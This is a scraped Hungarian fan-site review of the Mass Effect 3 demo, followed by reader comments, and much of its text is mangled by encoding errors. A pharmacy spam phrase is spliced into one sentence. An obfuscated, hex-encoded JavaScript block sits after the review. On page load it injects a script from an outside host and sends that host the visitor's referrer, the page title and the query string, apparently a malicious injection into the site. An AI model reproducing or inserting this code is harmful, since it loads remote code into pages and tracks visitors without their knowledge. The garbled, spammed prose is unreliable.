Üdvözlünk az SFportal nem hivatalos Mass Effect rajongói oldalán!

Kövess minket!



Vagy kérj e-mail értesítőt!

Enter your email address:

Delivered by FeedBurner

Mass Effect @ Google+

Mass Effect @ Facebook

A hivatalos magyar Mass Effect Facebook oldal

Csatlakozz!

RemA�ljA?k, nem okozott tA?l sok pA?rkapcsolati problA�mA?t a Bioware azzal, hogy Valentin napon adta ki a Mass Effect 3A�demojA?t – de legalA?bb emlA�kezetes alkalom lesz, amit mA�g sokA?ig emlegetni fogunk. De legalA?bbis amA�g ki nem jA�n mA?rciusban a jA?tA�k, addig mindenkA�ppen. 🙂

Ahogy azt beA�gA�rtA�k, kA�t kA?ldetA�st csinA?lhatunk meg – mindkettA� ismerA�s lesz azoknak, akik megnA�ztA�k pA�ldA?ul az E3 elA�zeteseit. Nem vacakolnak sokat az indA�tA?ssal, ezt nA�mileg bA?nom is: az eredeti tervek szerint Shepard tA?rgyalA?sA?val indA�tottunk volna, aminek keretA�ben az Arrival DLC-ben elkA�vetett cselekedeteinkA�rt vontak volna minket felelA�ssA�gre. Ez vA�gA?lis egy rA�vid meghallgatA?ssA? szelA�dA?lt, ahol a Parancsnok vA�lemA�nyA�t kA�rik ki a kialakult helyzetrA�l – ami nem mA?s, mint a KaszA?sok A�rkezA�se.

MA?r az elsA� Mass Effect jA?tA�k is meglehetA�sen filmszerA�re sikeredett, de a fejlA�dA�s lA?tvA?nyos volt az ME2 idejA�re – ez a fejlA�dA�s pedig a sildenafilo ventas . Lair of the Shadow BrokerA�DLC-ben csA?csosodott ki. Azt gondolom, hogy az ME3-ra viszont a demo alapjA?n tA�kA�letesen beA�rett a dolog, a Bioware lenyA�gA�zA� magabiztossA?ggal hasznA?lja a filmes eszkA�zA�ket. DinamikusabbA? vA?lt a kamerakezelA�s, a snittvA?ltA?sok, a jelenetek A�lA�bbek, mint valaha. Amikor pedig akciA?bA?l animA?ciA?ba vA?ltanak, majd vissza akciA?ba – sokkal gA�rdA?lA�kenyebb A�s termA�szetesebb, mint eddig megszokhattuk. Pedig mA?r a Mass Effect 2 esetA�ben sem volt okunk a panaszra ezA?gyben.

HasonlA? fejlA�dA�st lehet elmondani magA?rA?l a harcrendszerrA�l is: a Bioware megmondta, hogy mA�g dinamikusabbA? teszik a csatA?kat, A�s nem kamuztak. A ME2 “bebA?jok a fedezA�kbe, A�s szitA?vA? lA�vA�k mindenkit”-stA�lusa a demo kA�t pA?lyA?jA?hoz kA�pest elA�ggA� statikusnak tA�nik. Viszont a gyakori helyvA?ltoztatA?sra szerencsA�re nem csak az ellenfelek taktikA?ja kA�nyszerA�t rA? minket – teljesen termA�szetesnek A�reztem, hogy beugrok a fedezA�kbe, lelA�vA�k valakit, aztA?n A?tgA�rdA?lA�k mA?shova, vagy nyomulok elA�re. Egy nagysA?grenddel A�lvezetesebb lett a harc, amit nem gondoltam volna, hogy kA�pes mA�g fokozni a Bioware. A kA�zelharci tA?madA?sok is teljesen termA�szetesekkA� vA?ltak: az ME2-ben A�n mindig igyekeztem elkerA?lni a kA�zitusA?t, mA�g a demA?ban kimondottan kerestem a lehetA�sA�gA�t annak, hogy kioszthassak nA�hA?ny biotikus pofont.

ApropA?, biotika: mivel a fA� karakterem egy adeptus, ezA�rt nanA?, hogy ezzel indA�tottam a demA?t. SzerencsA�re a biotikus kA�pessA�geken is A�rzA�dik a harcrendszer dinamizmusa. Sokkal hatA?sosabbnak, halA?losabbnak A�reztem a biotikA?t, mint korA?bban – legalA?bbis az elsA�, fA�ldi pA?lyA?n.

A�s itt kell nA�hA?ny bosszantA? aprA?sA?gra A?ttA�rni a demA? kapcsA?n.

A mA?sodik pA?lyA?n ugyanis a 12. szintre lA�pA?nk, amikor is jA?pA?r kA�pessA�gpontot szA�toszthatunk. Ez mA�g rendben is van – viszont automatikusan A�s eldobhatatlanul kapunk nA�gy fegyvert. A cA�l nyilvA?n az volt, hogy kiprA?bA?lhassuk valamennyi fA�bb fegyvertA�pust – a demo problA�mA?jA?t egy egyA�bkA�nt jA? irA?nyba mutatA? fejlesztA�s jelenti. A vA�gleges jA?tA�kban mi dA�nthetjA?k el, hogy mennyi fegyvert viszA?nk magunkkal – azonban minA�l jobban felpakoljuk magunkat, annA?l tA�bb sA?lyt cipelA?nk magunkkal. Ez negatA�v hatA?ssal lesz viszont a kA�pessA�geink A?jratA�ltA�si idejA�re. Az adeptus esetA�ben brutA?lisan lassA�t a nA�gy fegyver: gyakorlatilag 100 A�vente egyszer tudtam egy biotikus kA�pessA�get ellA�ni. Asgy tA�nik, hogy a demo leginkA?bb csak a katonA?ra van optimalizA?lva, nem a tA�bbi karakter osztA?lyra.

A nA�gy fixen “beA�getett” fegyver mA?sik A?ldozata a beszivA?rgA? (infiltrator): a fegyverek kA�zA�tt ugyanis nincs mesterlA�vA�sz puska, A�gy pont azt nem tudjuk kiprA?bA?lni, hogy milyen lehet orgyilkolni a messzesA�gbA�l.

Ami mA�g a demo A?ldozatA?ul esett, azok a pA?rbeszA�d lehetA�sA�gek: a szalA?riA?n pA?lya is “in medias res” kezdA�dik, a pA?lyA?t bevezetA� mA?szkA?lA?s A�s Mordinnal valA? beszA�lgetA�s kikerA?lt a vA�gleges demobA?l (a decemberben vA�letlenA?l kiszivA?rgott verziA?ban mA�g benne volt). Ezzel ugyan feszesebbA�, akciA?dA?sabbA? vA?lt a demo, de szerintem A�gy pont az ME egyik lA�nyeges pontjA?t nem mutatjA?k be.

Viszont A�zelA�tA�t kapunk a megA?jult kA�pzettsA�g rendszerbA�l: ami gyakorlatilag ugyanA?gy mA�kA�dik, mint az ME2-ben. A kA�pzettsA�geknek van 3 alap szintje – viszont nem csak egy, hanem hA?rom fejlesztett szintet is kaphatunk, ahol kA�t mA?dosA�tA?sbA?l vA?laszthatunk. VA�gignA�zegetve Shepard, Liara A�s Garrus kA�pzettsA�geit, jA?nak tA�nik az irA?ny: sokkal jobban az egyA�ni jA?tA�kstA�lusokhoz alkalmazkodA? fejlA�dA�sre ad mA?dot.

A fegyvermA?dosA�tA?sokat viszont nem prA?bA?lhatjuk ki a demoban, ez is sajnA?latos mA?don kikerA?lt belA�le, pedig kA�vA?ncsi lettem volna erre is.

A legnagyobb feketepontot viszont a multiplayer miatt vagyok kA�nytelen elkA�nyvelni az elA�zetesnek: ugyanis egyelA�re csak a Battlefield 3 jA?tA�kosok fA�rhetnek hozzA?. Valamelyik EA-s marketinges zseniA?lis mA?don A?gy dA�ntA�tt, hogy ne a hA�sA�ges Mass Effect rajongA?k kapjanak elA�szA�r multiplayer lehetA�sA�get, hanem a BF3 vA?sA?rlA?i. Ez nyilvA?n segA�t abban, hogy A?jabb jA?tA�kosokat nyerjenek meg a franchisenak, de rajongA?kA�nt egy kicsit arculcsapA?skA�nt A�rtA�kelem a lA�pA�st. (Olyan rajongA?kA�nt, aki szA? nA�lkA?l megvette az ME2 gyA�jtA�i vA?ltozatA?t, az A�sszes DLC-t, A�s elA�rendelte az ME3 gyA�jtA�i kiadA?sA?t is.)

Mindenesetre a demo alapjA?n a jA?tA�kmenetet illetA�en egy ME2-hA�z hasonlA?, A?m dinamikusabb, polA�rozottabb jA?tA�kmenetet vA?rhatunk a Mass Effect 3-tA?l, ami nagyon biztatA?nak nA�z ki. A kis felvillanA?sok, amiket a sztoribA?l lA?thattunk, szintA�n jA?l megA�rtnak tA�nik: A�rzelmesebb aprA?sA?goktA?l kezdve Wrex beszA?lA?saiig minden a helyA�n van. Asgyhogy most megyek is vissza egy A?jabb vA�gigjA?tszA?sra.

 var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}

Mass Effect 3 demo – single player teszt bejegyzéshez 40 hozzászólás

  • IMP szerint:

    Merras: Azért lett BF3-asoknak előbb multija mert a Dice csapat nagyban segítette a Bioware munkáját a multi elkészítésében.

  • Merras szerint:

    És ezért nyilván kaptak egy rakat zsét. 🙂

    Tartom, hogy egy ilyen akció során azoknak a hűséges rajongóknak kellene előnyt adni, akik már addig is elköltöttek egy rakat pénzt a játékokra, DLC-kre, egyebekre, nem pedig tök “külsősöknek” kéne udvarolni.

    A recruitment program pedig nem műxik sajnos jól.

  • Krampusz szerint:

    Egy újítást berakhattak volna… arra gondolok, hogy a kinézet kiválasztásánál felkínálhattak volna egy lehetőséget a webkamerával rendelkezőknek, saját magunk ” Shepardítására…. ” érdekes lett volna…